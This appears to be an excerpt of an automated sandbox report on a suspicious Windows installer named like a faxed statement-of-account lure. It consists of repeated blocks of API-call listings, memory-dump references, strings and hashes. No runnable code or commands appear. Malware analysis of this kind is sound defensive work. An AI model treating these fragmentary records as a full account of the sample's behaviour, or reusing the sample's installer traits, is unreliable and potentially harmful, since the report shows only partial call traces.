                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                              • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                              • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                              • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-4010320282
                                                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                                                              • wsprintfW.USER32 ref: 00403095
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Spiltovene16,004030A8,004030A8,Spiltovene16,00000000,00000000,00000000), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Spiltovene16,Spiltovene16), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(002074E3,00000064,0020D94C), ref: 00403027
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 722711167-2449383134
                                                                                              • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                              • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                              • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                              • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                              • wsprintfW.USER32 ref: 00402FE5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1158693248
                                                                                              • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                              • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                              • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                              • wsprintfW.USER32 ref: 00404F1B
                                                                                              • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$H7B
                                                                                              • API String ID: 3540041739-107966168
                                                                                              • Opcode ID: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                                              • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                              • Opcode Fuzzy Hash: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                                              • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 3449924974-3081826266
                                                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                              APIs
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                              • String ID:
                                                                                              • API String ID: 1354259210-0
